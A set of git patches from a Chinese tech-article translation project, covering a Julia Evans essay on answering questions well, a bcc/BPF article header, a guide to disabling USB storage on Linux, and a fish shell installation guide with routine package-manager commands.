(“去读那些他妈的手册”(Read The Fucking Manual))是一个典型的无用的回答,但事实上如果向他们指明一个特定的文档会是非常有用的!当我提问题的时候,我当然很乐意翻看那些能实际解决我的问题的文档,因为它也可能解决其他我想问的问题。 + +我认为明确你所给的文档的确能够解决问题是非常重要的,或者至少经过查阅后确认它对解决问题有帮助。否则,你可能将以下面这种情形结束对话(非常常见): + +* Ali:我应该如何处理 X ? + +* Jada:<文档链接> + +* Ali: 这个并有实际解释如何处理 X ,它仅仅解释了如何处理 Y ! + +如果我所给的文档特别长,我会指明文档中那个我将会谈及的特定部分。[bash 手册][3] 有44000个字(真的!),所以如果只说“它在 bash 手册中有说明”是没有帮助的:) + + +### 告诉他们一个有用的搜索 + +在工作中,我经常发现我可以利用我所知道的关键字进行搜索找到能够解决我的问题的答案。对于初学者来说,这些关键字往往不是那么明显。所以说“这是我用来寻找这个答案的搜索”可能有用些。再次说明,回答时请经检查后以确保搜索能够得到他们所需要的答案:) + + +### 写新文档 + +人们经常一次又一次地问我的团队同样的问题。很显然这并不是他们的错(他们怎么能够知道在他们之前已经有10个人问了这个问题,且知道答案是什么呢?)因此,我们会尝试写新文档,而不是直接回答回答问题。 + +1. 马上写新文档 + +2. 给他们我们刚刚写好的新文档 + +3. 公示 + +写文档有时往往比回答问题需要花很多时间,但这是值得的。写文档尤其重要,如果: + +a. 这个问题被问了一遍又一遍 + +b. 随着时间的推移,这个答案不会变化太大(如果这个答案每一个星期或者一个月就会变化,文档就会过时并且令人受挫) + + +### 解释你做了什么 + +对于一个话题,作为初学者来说,这样的交流会真让人沮丧: + +* 新人:“嗨!你如何处理 X ?” + +* 有经验的人:“我已经处理过了,而且它已经完美解决了” + +* 新人:”...... 但是你做了什么?!“ + +如果问你问题的人想知道事情是如何进行的,这样是有帮助的: + +* 让他们去完成任务而不是自己做 + +* 告诉他们你是如何得到你给他们的答案的。 + +这可能比你自己做的时间还要长,但对于被问的人来说这是一个学习机会,因为那样做使得他们将来能够更好地解决问题。 + +这样,你可以进行更好的交流,像这: + +* 新人:“这个网站出现了错误,发生了什么?” + +* 有经验的人:(2分钟后)”oh 这是因为发生了数据库故障转移“ + +* 新人: ”你是怎么知道的??!?!?“ + +* 有经验的人:“以下是我所做的!“: + + 1. 通常这些错误是因为服务器 Y 被关闭了。我查看了一下 `$PLACE` 但它表明服务器 Y 开着。所以,并不是这个原因导致的。 + + 2. 然后我查看 X 的仪表盘 ,仪表盘的这个部分显示这里发生了数据库故障转移。 + + 3. 然后我在日志中找到了相应服务器,并且它显示连接数据库错误,看起来错误就是这里。 + +如果你正在解释你是如何调试一个问题,解释你是如何发现问题,以及如何找出问题的。尽管看起来你好像已经得到正确答案,但感觉更好的是能够帮助他们提高学习和诊断能力,并了解可用的资源。 + + +### 解决根本问题 + +这一点有点棘手。有时候人们认为他们依旧找到了解决问题的正确途径,且他们只再多一点信息就可以解决问题。但他们可能并不是走在正确的道路上!比如: + +* George:”我在处理 X 的时候遇到了错误,我该如何修复它?“ + +* Jasminda:”你是正在尝试解决 Y 吗?如果是这样,你不应该处理 X ,反而你应该处理 Z 。“ + +* George:“噢,你是对的!!!谢谢你!我回反过来处理 Z 的。“ + +Jasminda 一点都没有回答 George 的问题!反而,她猜测 George 并不想处理 X ,并且她是猜对了。这是非常有用的! + +如果你这样做可能会产生高高在上的感觉: + +* George:”我在处理 X 的时候遇到了错误,我该如何修复它?“ + +* Jasminda:不要这样做,如果你想处理 Y ,你应该反过来完成 Z 。 + +* George:“好吧,我并不是想处理 Y 。实际上我想处理 X 因为某些原因(REASONS)。所以我该如何处理 X 。 + +所以不要高高在上,且要记住有时有些提问者可能已经偏离根本问题很远了。同时回答提问者提出的问题以及他们本该提出的问题都是合理的:“嗯,如果你想处理 X ,那么你可能需要这么做,但如果你想用这个解决 Y 问题,可能通过处理其他事情你可以更好地解决这个问题,这就是为什么可以做得更好的原因。 + + +### 询问”那个回答可以解决您的问题吗?” + +我总是喜欢在我回答了问题之后核实是否真的已经解决了问题:”这个回答解决了您的问题吗?您还有其他问题吗?“在问完这个之后最好等待一会,因为人们通常需要一两分钟来知道他们是否已经找到了答案。 + +我发现尤其是问“这个回答解决了您的问题吗”这个额外的步骤在写完文档后是非常有用的。通常,在写关于我熟悉的东西的文档时,我会忽略掉重要的东西而不会意识到它。 + + +### 结对编程和面对面交谈 + +我是远程工作的,所以我的很多对话都是基于文本的。我认为这是沟通的默认方式。 + +今天,我们生活在一个方便进行小视频会议和屏幕共享的世界!在工作时候,在任何时间我都可以点击一个按钮并快速加入与他人的视频对话或者屏幕共享的对话中! + +例如,最近有人问如何自动调节他们的服务容量规划。我告诉他们我们有几样东西需要清理,但我还不太确定他们要清理的是什么。然后我们进行了一个简短的视屏会话并在5分钟后,我们解决了他们问题。 + +我认为,特别是如果有人真的被困在该如何开始一项任务时,开启视频进行结对编程几分钟真的比电子邮件或者一些即时通信更有效。 + + +### 不要表现得过于惊讶 + +这是源自 Recurse Center 的一则法则:[不要故作惊讶][4]。这里有一个常见的情景: + +* 某人1:“什么是 Linux 内核” + +* 某人2:“你竟然不知道什么是 Linux 内核(LINUX KERNEL)?!!!!?!!!????” + +某人2表现(无论他们是否真的如此惊讶)是没有帮助的。这大部分只会让某人1不好受,因为他们确实不知道什么是 Linux 内核。 + +我一直在假装不惊讶即使我事实上确实有点惊讶那个人不知道这种东西但它是令人敬畏的。 + +### 回答问题是令人敬畏的 + +显然并不是所有方法都是合适的,但希望你能够发现这里有些是有帮助的!我发现花时间去回答问题并教导人们是其实是很有收获的。 + +特别感谢 Josh Triplett 的一些建议并做了很多有益的补充,以及感谢 Harold Treen、Vaibhav Sagar、Peter Bhat Hatkins、Wesley Aptekar Cassels 和 Paul Gowder的阅读或评论。 + +-------------------------------------------------------------------------------- + +via: https://jvns.ca/blog/answer-questions-well/ + +作者:[ Julia Evans][a] +译者:[HardworkFish](https://github.com/HardworkFish) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://jvns.ca/about +[1]:https://jvns.ca/blog/good-questions/ +[2]:https://jvns.ca/blog/good-questions/ +[3]:https://linux.die.net/man/1/bash +[4]:https://jvns.ca/blog/2017/04/27/no-feigning-surprise/ + + + + + + + + From 700320a70be9fec280f1792d6e55f99ae190be69 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BC=A0=E5=AE=88=E6=B0=B8?= Date: Fri, 8 Dec 2017 23:03:32 +0800 Subject: [PATCH 0423/1627] Update 20171207 7 tools for analyzing performance in Linux with bccBPF.md --- ... tools for analyzing performance in Linux with bccBPF.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/sources/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md b/sources/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md index e6fd19e212..eebfa9e30d 100644 --- a/sources/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md +++ b/sources/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md @@ -3,7 +3,7 @@ translating by yongshouzhang 7 tools for analyzing performance in Linux with bcc/BPF ============================================================ -### Look deeply into your Linux code with these Berkeley Packet Filter (BPF) Compiler Collection (bcc) tools. +###使用伯克利的包过滤(BPF)编译器集合(BCC)工具深度探查你的 linux 代码。 [![](https://opensource.com/sites/default/files/styles/byline_thumbnail/public/pictures/brendan_face2017_620d.jpg?itok=xZzBQNcY)][7] 21 Nov 2017 [Brendan Gregg][8] [Feed][9] @@ -12,11 +12,11 @@ translating by yongshouzhang [4 comments][11] ![7 superpowers for Fedora bcc/BPF performance analysis](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/penguins%20in%20space_0.jpg?itok=umpCTAul) -Image by : +图片来源 : opensource.com -A new technology has arrived in Linux that can provide sysadmins and developers with a large number of new tools and dashboards for performance analysis and troubleshooting. It's called the enhanced Berkeley Packet Filter (eBPF, or just BPF), although these enhancements weren't developed in Berkeley, they operate on much more than just packets, and they do much more than just filtering. I'll discuss one way to use BPF on the Fedora and Red Hat family of Linux distributions, demonstrating on Fedora 26. +在 linux 中出现的一种新技术能够为系统管理员和开发者提供大量用于性能分析和故障排除的新工具和仪表盘。 它被称为增强的伯克利数据包过滤器(eBPF,或BPF),虽然这些改进并不由伯克利开发,它们不仅仅是处理数据包,更多的是过滤。我将讨论在 Fedora 和 Red Hat Linux 发行版中使用 BPF 的一种方法,并在 Fedora 26 上演示。 BPF can run user-defined sandboxed programs in the kernel to add new custom capabilities instantly. It's like adding superpowers to Linux, on demand. Examples of what you can use it for include: From 68f7096ad6aa82839d264a8ceaeebad36e73e742 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 9 Dec 2017 04:10:27 +0800 Subject: [PATCH 0424/1627] =?UTF-8?q?update=20at=202017=E5=B9=B4=2012?= =?UTF-8?q?=E6=9C=88=2009=E6=97=A5=20=E6=98=9F=E6=9C=9F=E5=85=AD=2004:10:2?= =?UTF-8?q?7=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- sources/tech/20170922 How to disable USB storage on Linux.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/sources/tech/20170922 How to disable USB storage on Linux.md b/sources/tech/20170922 How to disable USB storage on Linux.md index 36723ed34c..b7378c7940 100644 --- a/sources/tech/20170922 How to disable USB storage on Linux.md +++ b/sources/tech/20170922 How to disable USB storage on Linux.md @@ -1,5 +1,4 @@ -translating by lujun9972 -How to disable USB storage on Linux +Linux上如何禁用 USB 存储 ====== To secure our infrastructure of data breaches, we use software & hardware firewalls to restrict unauthorized access from outside but data breaches can occur from inside as well. To remove such a possibility, organizations limit & monitor the access to internet & also disable usb storage devices. From 8be1850397b58a991cb4cba04d0ccddc5cb4d2df Mon Sep 17 00:00:00 2001 From: cmn <2545489745@qq.com> Date: Sat, 9 Dec 2017 10:52:40 +0800 Subject: [PATCH 0425/1627] translated --- ...he Friendly Interactive Shell, In Linux.md | 338 ++++++++++++++++++ 1 file changed, 338 insertions(+) create mode 100644 translated/tech/20171206 How To Install Fish, The Friendly Interactive Shell, In Linux.md diff --git a/translated/tech/20171206 How To Install Fish, The Friendly Interactive Shell, In Linux.md b/translated/tech/20171206 How To Install Fish, The Friendly Interactive Shell, In Linux.md new file mode 100644 index 0000000000..e519106806 --- /dev/null +++ b/translated/tech/20171206 How To Install Fish, The Friendly Interactive Shell, In Linux.md @@ -0,0 +1,338 @@ +如何在 Linux 上安装友好的交互式 shell,Fish +====== +Fish,友好的交互式 shell 的缩写,它是一个适用于类 Unix 系统的装备良好,智能而且用户友好的 shell。Fish 有着很多重要的功能,比如自动建议,语法高亮,可搜索的历史记录(像在 bash 中 CTRL+r),智能搜索功能,极好的 VGA 颜色支持,基本的 web 设置,完善的手册页和许多开箱即用的功能。尽管安装并立即使用它吧。无需更多其他配置,你也不需要安装任何额外的附加组件/插件! + +在这篇教程中,我们讨论如何在 linux 中安装和使用 fish shell。 + +#### 安装 Fish + +尽管 fish 是一个非常用户友好的并且功能丰富的 shell,但在大多数 Linux 发行版的默认仓库中它并没有被包括。它只能在少数 Linux 发行版中的官方仓库中找到,如 Arch Linux,Gentoo,NixOS,和 Ubuntu 等。然而,安装 fish 并不难。 + +在 Arch Linux 和它的衍生版上,运行以下命令来安装它。 + +``` +sudo pacman -S fish +``` + +在 CentOS 7 上以 root 运行以下命令: + +``` +cd /etc/yum.repos.d/ +``` + +``` +wget https://download.opensuse.org/repositories/shells:fish:release:2/CentOS_7/shells:fish:release:2.repo +``` + +``` +yum install fish +``` + +在 CentOS 6 上以 root 运行以下命令: + +``` +cd /etc/yum.repos.d/ +``` + +``` +wget https://download.opensuse.org/repositories/shells:fish:release:2/CentOS_6/shells:fish:release:2.repo +``` + +``` +yum install fish +``` + +在 Debian 9 上以 root 运行以下命令: + +``` +wget -nv https://download.opensuse.org/repositories/shells:fish:release:2/Debian_9.0/Release.key -O Release.key +``` + +``` +apt-key add - < Release.key +``` + +``` +echo 'deb http://download.opensuse.org/repositories/shells:/fish:/release:/2/Debian_9.0/ /' > /etc/apt/sources.list.d/fish.list +``` + +``` +apt-get update +``` + +``` +apt-get install fish +``` + +在 Debian 8 上以 root 运行以下命令: + +``` +wget -nv https://download.opensuse.org/repositories/shells:fish:release:2/Debian_8.0/Release.key -O Release.key +``` + +``` +apt-key add - < Release.key +``` + +``` +echo 'deb http://download.opensuse.org/repositories/shells:/fish:/release:/2/Debian_8.0/ /' > /etc/apt/sources.list.d/fish.list +``` + +``` +apt-get update +``` + +``` +apt-get install fish +``` + +在 Fedora 26 上以 root 运行以下命令: + +``` +dnf config-manager --add-repo https://download.opensuse.org/repositories/shells:fish:release:2/Fedora_26/shells:fish:release:2.repo +``` + +``` +dnf install fish +``` + +在 Fedora 25 上以 root 运行以下命令: + +``` +dnf config-manager --add-repo https://download.opensuse.org/repositories/shells:fish:release:2/Fedora_25/shells:fish:release:2.repo +``` + +``` +dnf install fish +``` + +在 Fedora 24 上以 root 运行以下命令: + +``` +dnf config-manager --add-repo https://download.opensuse.org/repositories/shells:fish:release:2/Fedora_24/shells:fish:release:2.repo +``` + +``` +dnf install fish +``` + +在 Fedora 23 上以 root 运行以下命令: + +``` +dnf config-manager --add-repo https://download.opensuse.org/repositories/shells:fish:release:2/Fedora_23/shells:fish:release:2.repo +``` + +``` +dnf install fish +``` + +在 openSUSE 上以 root 运行以下命令: + +``` +zypper install fish +``` + +在 RHEL 7 上以 root 运行以下命令: + +``` +cd /etc/yum.repos.d/ +``` + +``` +wget https://download.opensuse.org/repositories/shells:fish:release:2/RHEL_7/shells:fish:release:2.repo +``` + +``` +yum install fish +``` + +在 RHEL-6 上以 root 运行以下命令: + +``` +cd /etc/yum.repos.d/ +``` + +``` +wget https://download.opensuse.org/repositories/shells:fish:release:2/RedHat_RHEL-6/shells:fish:release:2.repo +``` + +``` +yum install fish +``` + +在 Ubuntu 和它的衍生版上: + +``` +sudo apt-get update +``` + +``` +sudo apt-get install fish +``` + +就这样了。是时候探索 fish shell 了。 + +### 用法 + +要从你默认的 shell 切换到 fish,请执行以下操作: + +``` +$ fish +Welcome to fish, the friendly interactive shell +``` + +你可以在 ~/.config/fish/config.fish 上找到默认的 fish 配置(类似于 .bashrc)。如果它不存在,就创建它吧。 + +#### 自动建议 + +当我输入一个命令,它自动建议一个浅灰色的命令。所以,我需要输入一个 Linux 命令的前几个字母,然后按下 tab 键来完成这个命令。 + + [![](http://www.ostechnix.com/wp-content/uploads/2017/12/fish-1.png)][2] + +如果有更多的可能性,它将会列出它们。你可以使用上/下箭头键从列表中选择列出的命令。在选择你想运行的命令后,只需按下右箭头键,然后按下 ENTER 运行它。 + + [![](http://www.ostechnix.com/wp-content/uploads/2017/12/fish-2.png)][3] + +无需 CTRL+r 了!正如你已知道的,我们通过按 ctrl+r 来反向搜索 Bash shell 中的历史命令。但在 fish shell 中是没有必要的。由于它有自动建议功能,只需输入命令的前几个字母,然后从历史记录中选择已经执行的命令。Cool,是吗? + +#### 智能搜索 + +我们也可以使用智能搜索来查找一个特定的命令,文件或者目录。例如,我输入一个命令的子串,然后按向下箭头键进行智能搜索,再次输入一个字母来从列表中选择所需的命令。 + + [![](http://www.ostechnix.com/wp-content/uploads/2017/12/fish-6.png)][4] + +#### 语法高亮 + + +当你输入一个命令时,你将注意到语法高亮。请看下面当我在 Bash shell 和 fish shell 中输入相同的命令时截图的区别。 + +Bash: + + [![](http://www.ostechnix.com/wp-content/uploads/2017/12/fish-3.png)][5] + +Fish: + + [![](http://www.ostechnix.com/wp-content/uploads/2017/12/fish-4.png)][6] + +正如你所看到的,“sudo” 在 fish shell 中已经被高亮显示。此外,默认情况下它将以红色显示无效命令。 + +#### 基于 web 的配置 + +这是 fish shell 另一个很酷的功能。我们可以设置我们的颜色,更改 fish 提示,并从网页上查看所有功能,变量,历史记录,键绑定。 + +启动 web 配置接口,只需输入: + +``` +fish_config +``` + + [![](http://www.ostechnix.com/wp-content/uploads/2017/12/fish-5.png)][7] + +#### 手册页完成 + +Bash 和 其它 shells 支持可编程完成,但只有 fish 会通过解析已安装的手册自动生成他们。 + +为此,请运行: + +``` +fish_update_completions +``` + +实例输出将是: + +``` +Parsing man pages and writing completions to /home/sk/.local/share/fish/generated_completions/ + 3435 / 3435 : zramctl.8.gz +``` + +#### 禁用问候 + +默认情况下,fish 在启动时问候你(Welcome to fish, the friendly interactive shell)。如果你不想要这个问候消息,可以禁用它。为此,编辑 fish 配置文件: + +``` +vi ~/.config/fish/config.fish +``` + +添加以下行: + +``` +set -g -x fish_greeting '' +``` + +你也可以设置任意自定义的问候语,而不是禁用 fish 问候。 +Instead of disabling fish greeting, you can also set any custom greeting message. + +``` +set -g -x fish_greeting 'Welcome to OSTechNix' +``` + +#### 获得帮助 + +这是另一个引人注目的令人印象深刻的功能。要在终端的默认 web 浏览器中打开 fish 文档页面,只需输入: + +``` +help +``` + +官方文档将会在你的默认浏览器中打开。另外,你可以使用手册页来显示任何命令的帮助部分。 + +``` +man fish +``` + +#### 设置 fish 为默认 shell + +非常喜欢它?太好了!设置它作为默认 shell 吧。为此,请使用命令 chsh: + +``` +chsh -s /usr/bin/fish +``` + +在这里,/usr/bin/fish 是 fish shell 的路径。如果你不知道正确的路径,以下命令将会帮助你: + +``` +which fish +``` + +注销并且重新登录以使用新的默认 shell。 + +请记住,为 Bash 编写的许多 shell 脚本可能不完全兼容 fish。 + +要切换会 Bash,只需运行: + +``` +bash +``` + +如果你想 Bash 作为你的永久默认 shell,运行: + +``` +chsh -s /bin/bash +``` + +对目前的各位,这就是全部了。在这个阶段,你可能会得到一个有关 fish shell 使用的基本概念。 如果你正在寻找一个Bash的替代品,fish 可能是一个不错的选择。 + +Cheers! + +资源: + +* [fish shell website][1] + +-------------------------------------------------------------------------------- + +via: https://www.ostechnix.com/install-fish-friendly-interactive-shell-linux/ + +作者:[SK][a] +译者:[kimii](https://github.com/kimii) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.ostechnix.com/author/sk/ +[1]:https://fishshell.com/ +[2]:http://www.ostechnix.com/wp-content/uploads/2017/12/fish-1.png +[3]:http://www.ostechnix.com/wp-content/uploads/2017/12/fish-2.png +[4]:http://www.ostechnix.com/wp-content/uploads/2017/12/fish-6.png +[5]:http://www.ostechnix.com/wp-content/uploads/2017/12/fish-3.png +[6]:http://www.ostechnix.com/wp-content/uploads/2017/12/fish-4.png +[7]:http://www.ostechnix.com/wp-content/uploads/2017/12/fish-5.png From 6e6be0038e235f3f47fc9b719a54cd3155c4dbb5 Mon Sep 17 00:00:00 2001 From: kimii <2545489745@qq.com> Date: Sat, 9 Dec 2017 10:54:52 +0800 Subject: [PATCH 0426/1627] Delete 20171206 How To Install Fish, The Friendly Interactive Shell, In Linux.md --- ...he Friendly Interactive Shell, In Linux.md | 337 ------------------ 1 file changed, 337 deletions(-) delete mode 100644 sources/tech/20171206 How To Install Fish, The Friendly Interactive Shell, In Linux.md diff --git a/sources/tech/20171206 How To Install Fish, The Friendly Interactive Shell, In Linux.md b/sources/tech/20171206 How To Install Fish, The Friendly Interactive Shell, In Linux.md deleted file mode 100644 index 00a5ebadef..0000000000 --- a/sources/tech/20171206 How To Install Fish, The Friendly Interactive Shell, In Linux.md +++ /dev/null @@ -1,337 +0,0 @@ -Translating by kimii -How To Install Fish, The Friendly Interactive Shell, In Linux -====== -Fish, acronym of friendly interactive shell, is a well equipped, smart and user-friendly shell for Unix-like systems. Fish comes with many significant features, such as autosuggestions, syntax highlighting, searchable history (like CTRL+r in Bash), smart search functionality, glorious VGA color support, web based configuration, man page completions and many, out of the box. Just install it and start using it in no time. No more extra configuration or you don’t have to install any extra add-ons/plug-ins! - -In this tutorial, let us discuss how to install and use fish shell in Linux. - -#### Install Fish - -Even though fish is very user-friendly and feature-rich shell, it is not included in the default repositories of most Linux distributions. It is available in the official repositories of only few Linux distributions such as Arch Linux, Gentoo, NixOS, and Ubuntu etc. However, installing fish is not a big deal. - -On Arch Linux and its derivatives, run the following command to install it. - -``` -sudo pacman -S fish -``` - -On CentOS 7 run the following as root: - -``` -cd /etc/yum.repos.d/ -``` - -``` -wget https://download.opensuse.org/repositories/shells:fish:release:2/CentOS_7/shells:fish:release:2.repo -``` - -``` -yum install fish -``` - -On CentOS 6 run the following as root: - -``` -cd /etc/yum.repos.d/ -``` - -``` -wget https://download.opensuse.org/repositories/shells:fish:release:2/CentOS_6/shells:fish:release:2.repo -``` - -``` -yum install fish -``` - -On Debian 9 run the following as root: - -``` -wget -nv https://download.opensuse.org/repositories/shells:fish:release:2/Debian_9.0/Release.key -O Release.key -``` - -``` -apt-key add - < Release.key -``` - -``` -echo 'deb http://download.opensuse.org/repositories/shells:/fish:/release:/2/Debian_9.0/ /' > /etc/apt/sources.list.d/fish.list -``` - -``` -apt-get update -``` - -``` -apt-get install fish -``` - -On Debian 8 run the following as root: - -``` -wget -nv https://download.opensuse.org/repositories/shells:fish:release:2/Debian_8.0/Release.key -O Release.key -``` - -``` -apt-key add - < Release.key -``` - -``` -echo 'deb http://download.opensuse.org/repositories/shells:/fish:/release:/2/Debian_8.0/ /' > /etc/apt/sources.list.d/fish.list -``` - -``` -apt-get update -``` - -``` -apt-get install fish -``` - -On Fedora 26 run the following as root: - -``` -dnf config-manager --add-repo https://download.opensuse.org/repositories/shells:fish:release:2/Fedora_26/shells:fish:release:2.repo -``` - -``` -dnf install fish -``` - -On Fedora 25 run the following as root: - -``` -dnf config-manager --add-repo https://download.opensuse.org/repositories/shells:fish:release:2/Fedora_25/shells:fish:release:2.repo -``` - -``` -dnf install fish -``` - -On Fedora 24 run the following as root: - -``` -dnf config-manager --add-repo https://download.opensuse.org/repositories/shells:fish:release:2/Fedora_24/shells:fish:release:2.repo -``` - -``` -dnf install fish -``` - -On Fedora 23 run the following as root: - -``` -dnf config-manager --add-repo https://download.opensuse.org/repositories/shells:fish:release:2/Fedora_23/shells:fish:release:2.repo -``` - -``` -dnf install fish -``` - -On openSUSE: run the following as root: - -``` -zypper install fish -``` - -On RHEL 7 run the following as root: - -``` -cd /etc/yum.repos.d/ -``` - -``` -wget https://download.opensuse.org/repositories/shells:fish:release:2/RHEL_7/shells:fish:release:2.repo -``` - -``` -yum install fish -``` - -On RHEL-6 run the following as root: - -``` -cd /etc/yum.repos.d/ -``` - -``` -wget https://download.opensuse.org/repositories/shells:fish:release:2/RedHat_RHEL-6/shells:fish:release:2.repo -``` - -``` -yum install fish -``` - -On Ubuntu and its derivatives: - -``` -sudo apt-get update -``` - -``` -sudo apt-get install fish -``` - -That’s it. It is time explore fish shell. - -### Usage - -To switch to fish from your default shell, do: - -``` -$ fish -Welcome to fish, the friendly interactive shell -``` - -You can find the default fish configuration at ~/.config/fish/config.fish (similar to .bashrc). If it doesn’t exist, just create it. - -#### Auto suggestions - -When I type a command, it automatically suggests a command in a light grey color. So, I had to type a first few letters of a Linux and hit tab key to complete the command. - - [![](http://www.ostechnix.com/wp-content/uploads/2017/12/fish-1.png)][2] - -If there are more possibilities, it will list them. You can select the listed commands from the list by using up/down arrow keys. After choosing the command you want to run, just hit the right arrow key and press ENTER to run it. - - [![](http://www.ostechnix.com/wp-content/uploads/2017/12/fish-2.png)][3] - -No more CTRL+r! As you already know, we do reverse search by pressing ctrl+r to search for commands from history in Bash shell. But it is not necessary in fish shell. Since it has autosuggestions capability, just type first few letters of a command, and pick the command from the list that you already executed, from the history. Cool, yeah? - -#### Smart search - -We can also do smart search to find a specific command, file or directory. For example, I type the substring of a command, then hit the down arrow key to enter into smart search and again type a letter to pick the required command from the list. - - [![](http://www.ostechnix.com/wp-content/uploads/2017/12/fish-6.png)][4] - -#### Syntax highlighting - -You will notice the syntax highlighting as you type a command. See the difference in below screenshots when I type the same command in Bash and fish shells. - -Bash: - - [![](http://www.ostechnix.com/wp-content/uploads/2017/12/fish-3.png)][5] - -Fish: - - [![](http://www.ostechnix.com/wp-content/uploads/2017/12/fish-4.png)][6] - -As you see, “sudo” has been highlighted in fish shell. Also, it will display the invalid commands in red color by default. - -#### Web based configuration - -This is yet another cool feature of fish shell. We can can set our colors, change fish prompt, and view functions, variables, history, key bindings all from a web page. - -To start the web configuration interface, just type: - -``` -fish_config -``` - - [![](http://www.ostechnix.com/wp-content/uploads/2017/12/fish-5.png)][7] - -#### Man page completions - -Bash and other shells supports programmable completions, but only fish generates them automatically by parsing your installed man pages. - -To do so, run: - -``` -fish_update_completions -``` - -Sample output would be: - -``` -Parsing man pages and writing completions to /home/sk/.local/share/fish/generated_completions/ - 3435 / 3435 : zramctl.8.gz -``` - -#### Disable greetings - -By default, fish greets you (Welcome to fish, the friendly interactive shell) at startup. If you don’t this greeting message, you can disable it. To do so, edit fish configuration file: - -``` -vi ~/.config/fish/config.fish -``` - -Add the following line: - -``` -set -g -x fish_greeting '' -``` - -Instead of disabling fish greeting, you can also set any custom greeting message. - -``` -set -g -x fish_greeting 'Welcome to OSTechNix' -``` - -#### Getting help - -This one is another impressive feature that caught my attention. To open fish documentation page in your default web browser from Terminal, just type: - -``` -help -``` - -The official documentation will be opened in your default browser. Also, you can use man pages to display the help section of any command. - -``` -man fish -``` - -#### Set Fish as default shell - -Liked it very much? Great! Just set it as default shell. To do so, use chsh command: - -``` -chsh -s /usr/bin/fish -``` - -Here, /usr/bin/fish is the path to the fish shell. If you don’t know the correct path, the following command will help you. - -``` -which fish -``` - -Log out and log in back to use the new default shell. - -Please remember that many shell scripts written for Bash may not fully compatible with fish. - -To switch back to Bash, just run: - -``` -bash -``` - -If you want Bash as your default shell permanently, run: - -``` -chsh -s /bin/bash -``` - -And, that’s all for now folks. At this stage, you might get a basic idea about fish shell usage. If you’re looking for a Bash alternatives, fish might be a good option. - -Cheers! - -Resource: - -* [fish shell website][1] - --------------------------------------------------------------------------------- - -via: https://www.ostechnix.com/install-fish-friendly-interactive-shell-linux/ - -作者:[SK][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.ostechnix.com/author/sk/ -[1]:https://fishshell.com/ -[2]:http://www.ostechnix.com/wp-content/uploads/2017/12/fish-1.png -[3]:http://www.ostechnix.com/wp-content/uploads/2017/12/fish-2.png -[4]:http://www.ostechnix.com/wp-content/uploads/2017/12/fish-6.png -[5]:http://www.ostechnix.com/wp-content/uploads/2017/12/fish-3.png -[6]:http://www.ostechnix.com/wp-content/uploads/2017/12/fish-4.png -[7]:http://www.ostechnix.com/wp-content/uploads/2017/12/fish-5.png From 47a4f30b3838dd2712f168ae7b91123753dec325 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 9 Dec 2017 13:03:20 +0800 Subject: [PATCH 0427/1627] translated --- ...922 How to disable USB storage on Linux.md | 49 ++++++++++++------- 1 file changed, 31 insertions(+), 18 deletions(-) diff --git a/sources/tech/20170922 How to disable USB storage on Linux.md b/sources/tech/20170922 How to disable USB storage on Linux.md index b7378c7940..04a8b607b4 100644 --- a/sources/tech/20170922 How to disable USB storage on Linux.md +++ b/sources/tech/20170922 How to disable USB storage on Linux.md @@ -1,48 +1,61 @@ -Linux上如何禁用 USB 存储 +Linux 上如何禁用 USB 存储 ====== -To secure our infrastructure of data breaches, we use software & hardware firewalls to restrict unauthorized access from outside but data breaches can occur from inside as well. To remove such a possibility, organizations limit & monitor the access to internet & also disable usb storage devices. +为了保护数据不被泄漏,我们使用软件和硬件防火墙来限制外部未经授权的访问,但是数据泄露也可能发生在内部。 为了消除这种可能性,机构会限制和监测访问互联网,同时禁用 USB 存储设备。 -In this tutorial, we are going to discuss three different ways to disable USB storage devices on Linux machines. All the three methods have been tested on CentOS 6 & 7 machine & are working as they are supposed to . So let’s discuss all the three methods one by one, +在本教程中,我们将讨论三种不同的方法来禁用 Linux 机器上的 USB 存储设备。所有这三种方法都在 CentOS 6&7 机器上通过测试。那么让我们一一讨论这三种方法, -( Also Read : [Ultimate guide to securing SSH sessions][1] ) +( 另请阅读: [Ultimate guide to securing SSH sessions][1] ) -### Method 1 – Fake install +### 方法 1 – 伪安装 -In this method, we add a line ‘install usb-storage /bin/true’ which causes the ‘/bin/true’ to run instead of installing usb-storage module & that’s why it’s also called ‘Fake Install’ . To do this, create and open a file named ‘block_usb.conf’ (it can be something as well) in the folder ‘/etc/modprobe.d’, +在本方法中,我们往配置文件中添加一行 `install usb-storage /bin/true`, 这会让安装 usb-storage 模块的操作实际上变成运行 `/bin/true`, 这也是为什么这种方法叫做`伪安装`的原因。 具体来说就是, 在文件夹 `/etc/modprobe.d` 中创建并打开一个名为 `block_usb.conf` (也可能教其他名字) , +```shell $ sudo vim /etc/modprobe.d/block_usb.conf +``` -& add the below mentioned line, +然后将下行内容添加进去, +```shell install usb-storage /bin/true +``` -Now save the file and exit. +最后保存文件并退出。 -### Method 2 – Removing the USB driver +### 方法 2 – 删除 UBS 驱动 -Using this method, we can remove/move the drive for usb-storage (usb_storage.ko) from our machines, thus making it impossible to access a usb-storage device from the mahcine. To move the driver from it’s default location, execute the following command, +这种方法要求我们将 usb 存储的驱动程序(usb_storage.ko)删掉或者移走,从而达到无法再访问 usb 存储设备的目的。 执行下面命令可以将驱动从它默认的位置移走, execute the following command, +```shell $ sudo mv /lib/modules/$(uname -r)/kernel/drivers/usb/storage/usb-storage.ko /home/user1 +``` -Now the driver is not available on its default location & thus would not be 